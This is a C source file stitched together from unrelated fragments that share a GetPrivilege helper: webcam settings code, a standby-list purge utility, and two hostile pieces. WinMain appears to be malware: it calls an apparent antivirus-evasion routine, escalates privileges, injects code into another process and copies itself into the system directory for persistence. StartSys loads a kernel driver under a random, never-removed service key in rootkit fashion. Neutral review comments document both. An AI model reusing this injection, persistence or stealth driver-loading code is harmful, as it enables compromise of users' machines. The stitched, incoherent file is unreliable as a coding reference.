//-----------------------------------------------------------------
// Process entry point.  Builds "<system directory>\<MY_MACRO_RECORD_NAME>.exe"
// in a fixed 128-byte buffer, calls GetMaxPriv(), then calls InjectCode() with
// ProcIdByPriv(0) and &EnterPoint.  AddIntoSystem() is only reached when
// FileExist(buf) is false.  Always returns FALSE.
//
// NOTE(review): the two branches of the GetPrivilege("SeDebugPrivilege") test
// are identical, so the result of that call never influences control flow.
// NOTE(review): the strcat() calls are not bounded against sizeof buf; the
// resulting length depends on the system directory path at run time.
BOOL __stdcall WinMain(HINSTANCE, HINSTANCE, PTSTR, int)
{
    char buf[128];

    AVPsex();
    GetSystemDirectory(buf, 128);
    strcat(buf, "\\");
    strcat(buf, MY_MACRO_RECORD_NAME);
    strcat(buf, ".exe\0"); // the explicit "\0" is redundant: strcat stops at the first NUL
    GetMaxPriv();
    // InstallAndRegisterDrivers();
    if (GetPrivilege("SeDebugPrivilege")) {
        if (FileExist(buf)) {
            InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
        } else {
            InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
            // Called with 1 then 0; what the second argument selects is not visible here.
            AddIntoSystem(MY_MACRO_RECORD_NAME, 1);
            AddIntoSystem(MY_MACRO_RECORD_NAME, 0);
            return FALSE;
        }
    } else {
        // Same body as the branch above (see NOTE(review) in the header comment).
        if (FileExist(buf)) {
            InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
        } else {
            InjectCode(ProcIdByPriv(0), &EnterPoint, NULL);
            AddIntoSystem(MY_MACRO_RECORD_NAME, 1);
            AddIntoSystem(MY_MACRO_RECORD_NAME, 0);
            return FALSE;
        }
    }
    return FALSE;
}
/*
 * Copy the run-time parts of g_ConfigParam into g_WebCamState.
 *
 * hConnection: the HTTP connection used to evaluate GetPrivilege() when user
 *              checking is enabled.
 *
 * ucUserCheck is written before GetPrivilege() is called, so the callee sees
 * the updated flag; ucPrivilege is 0 whenever user checking is disabled.
 */
void SetRunTimeState(HTTPCONNECTION hConnection)
{
    g_WebCamState.ucUserCheck = (unsigned char)g_ConfigParam.bUserCheck;
    g_WebCamState.ucPrivilege = g_WebCamState.ucUserCheck
                                    ? (unsigned char)GetPrivilege(hConnection)
                                    : 0;
    g_WebCamState.ucMotionDetectWay = g_ConfigParam.ucMotionDetectWay;
}
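/*
 * Register a kernel driver under a throw-away service key and load it with
 * NtLoadDriver.
 *
 * chSysPath: NUL-terminated path of the .sys file; it is prefixed with "\??\"
 *            to form the ImagePath value.
 *
 * The key HKLM\system\currentcontrolset\services\<GetTickCount() in hex> is
 * created with Type=SERVICE_KERNEL_DRIVER and Start=SERVICE_DEMAND_START and
 * is not removed afterwards.  Progress and failures are reported through
 * DbgPrint only; there is no return value.
 */
VOID StartSys(LPCSTR chSysPath)
{
    NTSTATUS St;
    HKEY hKey;
    CHAR chRegPath[MAX_PATH];
    WCHAR wcLoadDrv[MAX_PATH];
    CHAR chImagePath[MAX_PATH] = "\\??\\";
    UNICODE_STRING usStr;
    DWORD dwType;
    DWORD dwRet;
    size_t prefixLen;

    GetPrivilege(SE_LOAD_DRIVER_PRIVILEGE);
    DbgPrint(__FUNCTION__"(): driver path '%s'\n", chSysPath);

    DWORD dwId = GetTickCount();
    _snprintf(chRegPath, RTL_NUMBER_OF(chRegPath) - 1,
              "system\\currentcontrolset\\services\\%x", dwId);
    /* _snprintf does not NUL-terminate on truncation; the last slot was
     * reserved above, so terminate explicitly. */
    chRegPath[RTL_NUMBER_OF(chRegPath) - 1] = '\0';
    _snwprintf(wcLoadDrv, RTL_NUMBER_OF(wcLoadDrv) - 1,
               L"\\registry\\machine\\system\\currentcontrolset\\services\\%x", dwId);
    wcLoadDrv[RTL_NUMBER_OF(wcLoadDrv) - 1] = L'\0';

    /* strncat's bound is the number of characters to append, not the size of
     * the destination, so account for the "\??\" prefix and the terminator
     * instead of passing sizeof(chImagePath). */
    prefixLen = strlen(chImagePath);
    if (strlen(chSysPath) + prefixLen >= sizeof(chImagePath)) {
        DbgPrint(__FUNCTION__"(): driver path too long\n");
        return;
    }
    strncat(chImagePath, chSysPath, sizeof(chImagePath) - prefixLen - 1);

    if (RegCreateKey(HKEY_LOCAL_MACHINE, chRegPath, &hKey) != ERROR_SUCCESS) {
        DbgPrint(__FUNCTION__"(): RegCreateKey last error %x\n", GetLastError());
        return;
    }

    /* Stop at the first failing value; a half-written key would make the
     * NtLoadDriver failure below harder to diagnose. */
    dwRet = RegSetValueEx(hKey, "ImagePath", 0, REG_SZ,
                          (LPBYTE)chImagePath, (DWORD)(strlen(chImagePath) + 1));
    if (dwRet == ERROR_SUCCESS) {
        dwType = SERVICE_KERNEL_DRIVER;
        dwRet = RegSetValueEx(hKey, "Type", 0, REG_DWORD, (LPBYTE)&dwType, sizeof(DWORD));
    }
    if (dwRet == ERROR_SUCCESS) {
        dwType = SERVICE_DEMAND_START;
        dwRet = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (LPBYTE)&dwType, sizeof(DWORD));
    }
    RegCloseKey(hKey);
    if (dwRet != ERROR_SUCCESS) {
        DbgPrint(__FUNCTION__"(): RegSetValueEx error %x\n", dwRet);
        return;
    }

    RtlInitUnicodeString(&usStr, wcLoadDrv);
    St = NtLoadDriver(&usStr);
    DbgPrint(__FUNCTION__"(): NtLoadDriver status %x\n", St);
}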
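/*
 * Purge the Windows standby list by calling NtSetSystemInformation with
 * SystemMemoryListInformation / MemoryPurgeStandbyList.
 *
 * SeProfileSingleProcessPrivilege is enabled on the current process token via
 * GetPrivilege() first; the token is closed on every path before the call.
 * NtSetSystemInformation is resolved at run time from ntdll.dll.
 *
 * Returns the status from NtSetSystemInformation (STATUS_SUCCESS on success),
 * or the value returned by error() when a setup step fails.
 */
static int cmd_dropcaches(void)
{
	HANDLE hProcess = GetCurrentProcess();
	HANDLE hToken;
	HMODULE ntdll;
	DWORD(WINAPI *NtSetSystemInformation)(INT, PVOID, ULONG);
	SYSTEM_MEMORY_LIST_COMMAND command;
	int status;

	if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
		return error("Can't open current process token");

	/* hToken must be closed on the failure path as well, not only on success. */
	if (!GetPrivilege(hToken, "SeProfileSingleProcessPrivilege", 1)) {
		CloseHandle(hToken);
		return error("Can't get SeProfileSingleProcessPrivilege");
	}
	CloseHandle(hToken);

	ntdll = LoadLibrary("ntdll.dll");
	if (!ntdll)
		return error("Can't load ntdll.dll, wrong Windows version?");

	NtSetSystemInformation = (DWORD(WINAPI *)(INT, PVOID, ULONG))
		GetProcAddress(ntdll, "NtSetSystemInformation");
	if (!NtSetSystemInformation) {
		/* Balance the LoadLibrary reference before bailing out. */
		FreeLibrary(ntdll);
		return error("Can't get function addresses, wrong Windows version?");
	}

	command = MemoryPurgeStandbyList;
	status = NtSetSystemInformation(SystemMemoryListInformation, &command,
					sizeof(SYSTEM_MEMORY_LIST_COMMAND));
	if (status == STATUS_PRIVILEGE_NOT_HELD)
		error("Insufficient privileges to purge the standby list, need admin access");
	else if (status != STATUS_SUCCESS)
		error("Unable to execute the memory list command %d", status);

	FreeLibrary(ntdll);
	return status;
}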